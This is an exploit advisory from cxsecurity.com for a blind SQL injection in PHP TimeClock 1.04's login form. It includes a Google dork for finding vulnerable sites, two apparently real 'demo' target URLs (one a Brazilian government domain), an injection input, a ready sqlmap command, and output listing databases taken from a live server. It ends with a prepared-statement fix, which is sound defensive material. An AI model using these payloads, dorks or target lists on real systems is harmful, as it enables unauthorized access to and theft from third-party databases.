PHP TimeClock 1.04 - Blind SQL Injection Vulnerability

2016.01.24
Credit: Blast3r_ma
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################
# Exploit Title: PHP TimeClock 1.04 - Blind SQL Injection Vulnerability
# Google Dork: intitle:"PHP timeclock 1.04" intext:"PHP Timeclock Admin Login" inurl:"login.php"
# Date: 23-1-2016
# Twitter: https://twitter.com/Blast3r_ma
# Exploit Author: Blast3r_ma
# Software Link: http://sourceforge.net/projects/timeclock/files/PHP%20Timeclock/PHP%20Timeclock%201.04/
# Tested on: Linux
# Version: 1.04
################################################

============ Vulnerable lines in login.php ===========================

if (isset($_POST['login_userid']) && (isset($_POST['login_password']))) {
    $login_userid = $_POST['login_userid'];
    $login_password = crypt($_POST['login_password'], 'xy');
    // $login_userid is concatenated into the SQL string without escaping or
    // parameter binding, so a single quote in the POST field closes the
    // literal and the rest of the value becomes SQL (CWE-89).
    $query = "select empfullname, employee_passwd, admin, time_admin from ".$db_prefix."employees where empfullname = '".$login_userid."'";
    $result = mysql_query($query);
    while ($row=mysql_fetch_array($result)) {
        $admin_username = "".$row['empfullname']."";
        $admin_password = "".$row['employee_passwd']."";
        $admin_auth = "".$row['admin']."";
        $time_admin_auth = "".$row['time_admin']."";
    }
} // end of the if block; the advisory omits the remainder of login.php
======================================================================

======================== Demos: ============================
http://www.quecomputersmankato.com/timeclock/login.php
http://www.pontoweb.ac.gov.br/login.php
...
=======================================================================
================== PoC-Exploit ==================
http://<target>/timeclock-1.04/login.php or http://<target>/login.php
User: lll'
PW: notimportant

Exploit Code:
sqlmap --url="http://www.Target.com/login.php" --data="login_userid=admin&login_password=slkdjfslkdjf" -p login_userid --random-agent --level=5 --risk=3 --dbs
============================================================

============================== Result ==============================
sqlmap identified the following injection point(s) with a total of 1147 HTTP(s) requests:
---
Parameter: login_userid (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: login_userid=admin' RLIKE (SELECT (CASE WHEN (3926=3926) THEN 0x61646d696e ELSE 0x28 END)) AND 'hICG'='hICG&login_password=slkdjfslkdjf

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: login_userid=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))ZvHA) AND 'HGpb'='HGpb&login_password=slkdjfslkdjf
---
[14:03:23] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Apache
back-end DBMS: MySQL 5.0.12
[14:03:23] [INFO] fetching database names
[14:03:23] [INFO] fetching number of databases
[14:03:23] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:03:23] [INFO] retrieved: 5
[14:03:28] [INFO] retrieved: information_schema
[14:05:15] [INFO] retrieved: mysql
[14:05:54] [INFO] retrieved: pontoweb
[14:07:06] [INFO] retrieved: recebimento
[14:08:35] [INFO] retrieved: test
available databases [5]:
[*] information_schema
[*] mysql
[*] pontoweb
[*] recebimento
[*] test
===================================================================================
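The injection point is the unescaped concatenation of login_userid in login.php. As an added example (not PHP TimeClock's own code), the same lookup rewritten with a mysqli prepared statement, which is the direct fix for this bug; it assumes $link is an open mysqli connection and $db_prefix is the application's table prefix, as in the original file.

```php
<?php
// Added example, not part of the PHP TimeClock project. Assumes $link is an
// open mysqli connection and $db_prefix the configured table prefix.

function timeclock_lookup_user(mysqli $link, string $db_prefix, string $login_userid): ?array
{
    // A table name cannot be bound, but $db_prefix comes from the application's
    // config, not from the request. Everything request-controlled is bound below.
    $sql = "SELECT empfullname, employee_passwd, admin, time_admin FROM "
         . $db_prefix . "employees WHERE empfullname = ?";

    $stmt = mysqli_prepare($link, $sql);
    if ($stmt === false) {
        return null;
    }
    // 's' binds the value as a string: quotes, RLIKE or SLEEP() in the
    // POST field are compared as data, never parsed as SQL.
    mysqli_stmt_bind_param($stmt, 's', $login_userid);
    mysqli_stmt_execute($stmt);
    $result = mysqli_stmt_get_result($stmt);
    $row = $result ? mysqli_fetch_assoc($result) : null;
    mysqli_stmt_close($stmt);
    return $row ?: null;
}

function timeclock_check_login(mysqli $link, string $db_prefix, string $login_userid, string $login_password): bool
{
    $row = timeclock_lookup_user($link, $db_prefix, $login_userid);
    if ($row === null) {
        return false;
    }
    // Keeps the stored hash format from the original (crypt with the fixed
    // salt 'xy', i.e. legacy DES crypt) so existing rows still verify;
    // hash_equals() compares in constant time. Moving to password_hash()/
    // password_verify() is a separate change from the injection fix.
    $candidate = crypt($login_password, 'xy');
    return hash_equals($row['employee_passwd'], $candidate);
}

if (isset($_POST['login_userid'], $_POST['login_password'])) {
    $ok = timeclock_check_login($link, $db_prefix, $_POST['login_userid'], $_POST['login_password']);
    // $ok is true only when one employee row matches both the name and the hash.
}
```

With the parameter bound, the sqlmap payloads shown above no longer change the query's structure, so both the boolean-based and the time-based vectors stop working.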
Copyright 2021, cxsecurity.com